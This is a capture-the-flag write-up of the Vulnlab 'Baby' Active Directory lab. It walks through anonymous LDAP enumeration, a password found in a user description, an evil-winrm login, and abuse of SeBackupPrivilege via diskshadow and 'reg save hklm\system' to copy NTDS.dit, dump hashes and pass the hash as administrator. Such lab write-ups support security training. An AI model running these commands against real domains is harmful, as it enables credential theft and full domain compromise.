2023-06-17 23:13:40 +03:00
# Vulnlab - Baby
Nmap scan report for
Host is up (0.081s latency).
Not shown: 65523 filtered tcp ports (no-response)
53/tcp open domain Simple DNS Plus
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
3268/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-16T16:00:59
| Not valid after: 2023-12-16T16:00:59
| MD5: 55aa85b5f2fd316af5fbb1c8ad357d53
|_SHA-1: ae0ab02e5de2d54a9180931ff745d5a00deb41a2
|_ssl-date: 2023-06-17T16:09:48+00:00; +24s from scanner time.
5985/tcp open tcpwrapped
49664/tcp open tcpwrapped
60083/tcp open tcpwrapped
65331/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
## PORT 445 (SMB)
Enumerating smb shares with anonymous user it doesn't allow us to either list or read shares being unauthenticated
<img src="https://i.imgur.com/eYIUk4w.png"/>
We can move on to ldap which is running on port 389
## PORT 389 (LDAP)
On checking ldap with null authentication
ldapsearch -x -H ldap:// -D '' -w '' -b "DC=baby,DC=vl"
This starts to return us usernames
<img src="https://i.imgur.com/isY45pH.png"/>
We can use grep to filter for usernames
ldapsearch -x -H ldap:// -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' | awk '{ gsub(/ /,""); print }'
<img src="https://i.imgur.com/spQzXI1.png"/>
With `kerbrute` we can verify domain users which also perform AS-REP roasting but here it didn't found any domain user with pre-authentication disabled
<img src="https://i.imgur.com/YfypfOu.png"/>
We can grep for user descriptions where on `Teresa.Bell` 's password was found from it's description
<img src="https://i.imgur.com/WMFF3HJ.png"/>
But using this password for Teresa failed as this password doesn't belong to her
<img src="https://i.imgur.com/QUSMgC3.png"/>
Spraying this password across the domain didn't worked as well
<img src="https://i.imgur.com/iznIIgx.png"/>
## Foothold (Connor.Wilkinson)
So going back to ldap, there was a user`Caroline.Robinson` which didn't had any attributes thus didn't get covered when it was getting filtered with `sAMAccountName`
<img src="https://i.imgur.com/bDojsRM.png"/>
For this username the password is valid but it needs to be changed
<img src="https://i.imgur.com/PzhDxh5.png"/>
We can change her password by using impacket's `smbpasswd` by referring to this article
smbpasswd -U Caroline.Robinson -r
<img src="https://i.imgur.com/fttEduI.png"/>
We can try authenticating on WinRM to see if this user is in remote desktop group
<img src="https://i.imgur.com/kTADncK.png"/>
It shows Pwn3d! status which means we can login through WinRM
evil-winrm -i -u 'Caroline.Robinson' -p 'BabyStart12345$Abc#!'
<img src="https://i.imgur.com/rgJR7uU.png"/>
Checking the privileges of this account with `whoami /all` we have `SeBackupPrivilege` privilege
<img src="https://i.imgur.com/JOAVqu3.png"/>
>Caroline's password will keep getting revert back as there was a script running, so you'll need to change the password again
## Privilege Escalation (Administrator)
Following this article to abuse `SeBackupPrivilege`
Create a `dsh` script file and convert it to dos format with `unix2dos`
set context persistent nowriters
add volume c: alias owo
expose %owo% z:
<img src="https://i.imgur.com/5jeZKcC.png"/>
Now with `robocop`, copying `NTDS.dit` file in current directory
<img src="https://i.imgur.com/28xvP0k.png"/>
<img src="https://i.imgur.com/yIB1HM8.png"/>
Downloading the file on to our kali machine
<img src="https://i.imgur.com/1oEKuMr.png"/>
After downloading the file we'll have ntds.dit
<img src="https://i.imgur.com/S2EiIxv.png"/>
We'll also need `SYSTEM` file
reg save hklm\system C:\Windows\Temp\system
<img src="https://i.imgur.com/Ax68SRu.png"/>
Having this file, we'll be able to parse through NTDS.dit file to dump hashes and get the administrator's hash
<img src="https://i.imgur.com/Xcp2BMe.png"/>
Now with `pass the hash` we'll be able to login as administrator
<img src="https://i.imgur.com/D1c5czy.png"/>
## References
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
- https://exploit-notes.hdks.org/exploit/windows/active-directory/smb-pentesting/